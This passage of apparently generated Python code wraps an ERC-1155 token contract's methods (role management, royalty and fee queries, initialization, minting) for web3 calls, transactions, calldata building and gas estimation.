        raw_value = self._underlying_method().call(normalized.as_dict())
        return str(raw_value)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(normalized.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(normalized.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(normalized.as_dict())
class ContractVersionMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractVersion method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = super().normalize_tx_params(tx_params)
        raw_value = self._underlying_method().call(normalized.as_dict())
        return int(raw_value)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(normalized.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(normalized.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        normalized = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(normalized.as_dict())
class GetDefaultRoyaltyInfoMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the getDefaultRoyaltyInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # two-element Solidity tuple: (recipient address, royalty bps)
        return (
            returned[0],
            returned[1],
        )

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class GetPlatformFeeInfoMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getPlatformFeeInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # two-element Solidity tuple: (fee recipient address, fee bps)
        return (
            returned[0],
            returned[1],
        )

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class GetRoleAdminMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleAdmin method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data.

        :param web3_or_provider: Web3 instance or raw provider to talk to
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction to delegate to
        :param validator: input validator; a no-op default is used when None
        """
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Validate the inputs to the getRoleAdmin method.

        :param role: role identifier (bytes32)
        """
        self.validator.assert_valid(
            method_name="getRoleAdmin",
            parameter_name="role",
            argument_value=role,
        )
        return role

    def call(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(role).call(tx_params.as_dict())
        # Bug fix: the generator emitted ``Union[bytes, str](returned)``,
        # but ``typing.Union`` is not instantiable and raises TypeError at
        # runtime.  HexBytes is a bytes subclass, so it satisfies the
        # declared ``Union[bytes, str]`` return type.
        return HexBytes(returned)

    def send_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).transact(tx_params.as_dict())

    def build_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMember method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], index: int
    ):
        """Validate the inputs to the getRoleMember method.

        :param role: role identifier (bytes32)
        :param index: position in the role's member list
        """
        self.validator.assert_valid(
            method_name="getRoleMember",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="getRoleMember",
            parameter_name="index",
            argument_value=index,
        )
        # safeguard against fractional inputs
        index = int(index)
        return (role, index)

    def call(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role, index) = self.validate_and_normalize_inputs(role, index)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(role, index).call(
            tx_params.as_dict()
        )
        return str(returned)

    def send_transaction(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role, index) = self.validate_and_normalize_inputs(role, index)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, index).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role, index) = self.validate_and_normalize_inputs(role, index)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, index).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        role: Union[bytes, str],
        index: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (role, index) = self.validate_and_normalize_inputs(role, index)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, index).estimateGas(
            tx_params.as_dict()
        )
class GetRoleMemberCountMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the getRoleMemberCount method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, role: Union[bytes, str]):
        """Validate the inputs to the getRoleMemberCount method.

        :param role: role identifier (bytes32)
        """
        self.validator.assert_valid(
            method_name="getRoleMemberCount",
            parameter_name="role",
            argument_value=role,
        )
        return role

    def call(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(role).call(tx_params.as_dict())
        return int(returned)

    def send_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).transact(tx_params.as_dict())

    def build_transaction(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (role) = self.validate_and_normalize_inputs(role)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoyaltyInfoForTokenMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the getRoyaltyInfoForToken method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, token_id: int):
        """Validate the inputs to the getRoyaltyInfoForToken method.

        :param token_id: id of the token whose royalty info is queried
        """
        self.validator.assert_valid(
            method_name="getRoyaltyInfoForToken",
            parameter_name="_tokenId",
            argument_value=token_id,
        )
        # safeguard against fractional inputs
        token_id = int(token_id)
        return token_id

    def call(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> Tuple[str, int]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (token_id) = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(token_id).call(tx_params.as_dict())
        # two-element Solidity tuple: (recipient address, royalty bps)
        return (
            returned[0],
            returned[1],
        )

    def send_transaction(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (token_id) = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).transact(tx_params.as_dict())

    def build_transaction(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (token_id) = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, token_id: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (token_id) = self.validate_and_normalize_inputs(token_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(token_id).estimateGas(
            tx_params.as_dict()
        )
class GrantRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the grantRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the grantRole method."""
        self.validator.assert_valid(
            method_name="grantRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="grantRole",
            parameter_name="account",
            argument_value=account,
        )
        # Checksum the address after both arguments pass validation.
        return (role, self.validate_and_checksum_address(account))

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(role, account).call(params)

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class HasRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the hasRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the hasRole method."""
        self.validator.assert_valid(
            method_name="hasRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="hasRole",
            parameter_name="account",
            argument_value=account,
        )
        # Checksum the address after both arguments pass validation.
        return (role, self.validate_and_checksum_address(account))

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: True when the account holds the role.
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(role, account).call(params))

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).transact(params)

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).buildTransaction(params)

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        role, account = self.validate_and_normalize_inputs(role, account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(role, account).estimateGas(params)
class InitializeMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the initialize method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        royalty_recipient: str,
        royalty_bps: int,
        platform_fee_bps: int,
        platform_fee_recipient: str,
    ):
        """Validate the inputs to the initialize method.

        Validation and address checksumming are interleaved in the same
        order as the contract's parameter list, so the first invalid
        argument is the one reported.
        """
        assert_valid = self.validator.assert_valid
        checksum = self.validate_and_checksum_address
        assert_valid(
            method_name="initialize",
            parameter_name="_defaultAdmin",
            argument_value=default_admin,
        )
        default_admin = checksum(default_admin)
        assert_valid(
            method_name="initialize",
            parameter_name="_name",
            argument_value=name,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_symbol",
            argument_value=symbol,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_contractURI",
            argument_value=contract_uri,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_trustedForwarders",
            argument_value=trusted_forwarders,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_primarySaleRecipient",
            argument_value=primary_sale_recipient,
        )
        primary_sale_recipient = checksum(primary_sale_recipient)
        assert_valid(
            method_name="initialize",
            parameter_name="_royaltyRecipient",
            argument_value=royalty_recipient,
        )
        royalty_recipient = checksum(royalty_recipient)
        assert_valid(
            method_name="initialize",
            parameter_name="_royaltyBps",
            argument_value=royalty_bps,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_platformFeeBps",
            argument_value=platform_fee_bps,
        )
        assert_valid(
            method_name="initialize",
            parameter_name="_platformFeeRecipient",
            argument_value=platform_fee_recipient,
        )
        platform_fee_recipient = checksum(platform_fee_recipient)
        return (
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            royalty_recipient,
            royalty_bps,
            platform_fee_bps,
            platform_fee_recipient,
        )

    def call(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        royalty_recipient: str,
        royalty_bps: int,
        platform_fee_bps: int,
        platform_fee_recipient: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            royalty_recipient,
            royalty_bps,
            platform_fee_bps,
            platform_fee_recipient,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(*normalized).call(params)

    def send_transaction(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        royalty_recipient: str,
        royalty_bps: int,
        platform_fee_bps: int,
        platform_fee_recipient: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            royalty_recipient,
            royalty_bps,
            platform_fee_bps,
            platform_fee_recipient,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).transact(params)

    def build_transaction(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        royalty_recipient: str,
        royalty_bps: int,
        platform_fee_bps: int,
        platform_fee_recipient: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            royalty_recipient,
            royalty_bps,
            platform_fee_bps,
            platform_fee_recipient,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).buildTransaction(params)

    def estimate_gas(
        self,
        default_admin: str,
        name: str,
        symbol: str,
        contract_uri: str,
        trusted_forwarders: List[str],
        primary_sale_recipient: str,
        royalty_recipient: str,
        royalty_bps: int,
        platform_fee_bps: int,
        platform_fee_recipient: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        normalized = self.validate_and_normalize_inputs(
            default_admin,
            name,
            symbol,
            contract_uri,
            trusted_forwarders,
            primary_sale_recipient,
            royalty_recipient,
            royalty_bps,
            platform_fee_bps,
            platform_fee_recipient,
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).estimateGas(params)
class IsApprovedForAllMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the isApprovedForAll method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str, operator: str):
        """Validate the inputs to the isApprovedForAll method."""
        self.validator.assert_valid(
            method_name="isApprovedForAll",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="isApprovedForAll",
            parameter_name="operator",
            argument_value=operator,
        )
        operator = self.validate_and_checksum_address(operator)
        return (account, operator)

    def call(
        self, account: str, operator: str, tx_params: Optional[TxParams] = None
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: True when the operator is approved for all of the account's
            tokens.
        """
        account, operator = self.validate_and_normalize_inputs(
            account, operator
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(account, operator).call(params))

    def send_transaction(
        self, account: str, operator: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account, operator = self.validate_and_normalize_inputs(
            account, operator
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, operator).transact(params)

    def build_transaction(
        self, account: str, operator: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        account, operator = self.validate_and_normalize_inputs(
            account, operator
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, operator).buildTransaction(
            params
        )

    def estimate_gas(
        self, account: str, operator: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        account, operator = self.validate_and_normalize_inputs(
            account, operator
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, operator).estimateGas(params)
class IsTrustedForwarderMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the isTrustedForwarder method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, forwarder: str):
        """Validate the inputs to the isTrustedForwarder method."""
        self.validator.assert_valid(
            method_name="isTrustedForwarder",
            parameter_name="forwarder",
            argument_value=forwarder,
        )
        return self.validate_and_checksum_address(forwarder)

    def call(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: True when the address is a trusted forwarder.
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method(forwarder).call(params))

    def send_transaction(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).transact(params)

    def build_transaction(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).buildTransaction(params)

    def estimate_gas(
        self, forwarder: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        forwarder = self.validate_and_normalize_inputs(forwarder)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(forwarder).estimateGas(params)
class MintToMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the mintTo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, to: str, token_id: int, uri: str, amount: int
    ):
        """Validate the inputs to the mintTo method."""
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="_to",
            argument_value=to,
        )
        to = self.validate_and_checksum_address(to)
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="_tokenId",
            argument_value=token_id,
        )
        # Coerce to int to safeguard against fractional inputs.
        token_id = int(token_id)
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="_uri",
            argument_value=uri,
        )
        self.validator.assert_valid(
            method_name="mintTo",
            parameter_name="_amount",
            argument_value=amount,
        )
        # Coerce to int to safeguard against fractional inputs.
        amount = int(amount)
        return (to, token_id, uri, amount)

    def call(
        self,
        to: str,
        token_id: int,
        uri: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        normalized = self.validate_and_normalize_inputs(
            to, token_id, uri, amount
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(*normalized).call(params)

    def send_transaction(
        self,
        to: str,
        token_id: int,
        uri: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        normalized = self.validate_and_normalize_inputs(
            to, token_id, uri, amount
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).transact(params)

    def build_transaction(
        self,
        to: str,
        token_id: int,
        uri: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        normalized = self.validate_and_normalize_inputs(
            to, token_id, uri, amount
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).buildTransaction(params)

    def estimate_gas(
        self,
        to: str,
        token_id: int,
        uri: str,
        amount: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        normalized = self.validate_and_normalize_inputs(
            to, token_id, uri, amount
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(*normalized).estimateGas(params)
class MintWithSignatureMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the mintWithSignature method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, req: ITokenERC1155MintRequest, signature: Union[bytes, str]
    ):
        """Validate the inputs to the mintWithSignature method."""
        self.validator.assert_valid(
            method_name="mintWithSignature",
            parameter_name="_req",
            argument_value=req,
        )
        self.validator.assert_valid(
            method_name="mintWithSignature",
            parameter_name="_signature",
            argument_value=signature,
        )
        return (req, signature)

    def call(
        self,
        req: ITokenERC1155MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        req, signature = self.validate_and_normalize_inputs(req, signature)
